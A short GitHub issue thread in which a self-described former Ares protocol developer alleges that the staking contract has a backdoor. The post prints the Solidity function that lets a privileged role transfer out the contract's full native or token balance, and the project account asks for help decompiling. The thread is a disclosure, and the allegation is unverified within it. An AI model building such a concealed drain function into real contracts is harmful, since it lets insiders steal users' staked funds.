### ISSUE TITLE
Codes reviews ->  staking backdoor

### ISSUE THREAD

**Issue by lyxyx** [Aresprotocol/recap_aresprotocol#1]
我是曾经的Ares核心开发者， 质押挖矿参与了部分测试，合约有一个后门，可以随意转出里面的ARES，所以无法过审计。
反编译后可以查字符串"DPAddr: tokenAddr is zero"，部署的合约后门代码如下

I used to be a core Ares developer and I was involved in the staking testing. The contract has a backdoor that can be transferred out of Ares at will, so it can't be audited.  After decompilation, you can check the string "DPAddr: tokenAddr is zero". The deployed contract backdoor code is as follows. LOL

`function withTRC20(address tokenAddr, address payable recipient,uint256 amount,bool isTrue) public onlyRewardDistribution{
        require(tokenAddr != address(0),"DPAddr: tokenAddr is zero");
        require(recipient != address(0),"DPAddr: recipient is zero");
        if (isTrue){
            require(address(this).balance >= amount,"not egl balance");
            recipient.transfer(amount);
        }else{
            IERC20  tkCoin = IERC20(tokenAddr);
            if(tkCoin.balanceOf(address(this)) >= amount){
                tkCoin.transfer(recipient,amount);
            }else{
                tkCoin.transfer(recipient,tkCoin.balanceOf(address(this))) ;
            }
        }
}
`

**Comment by Aresprotocol** [comment]
Anyboday can help to decompile the code?
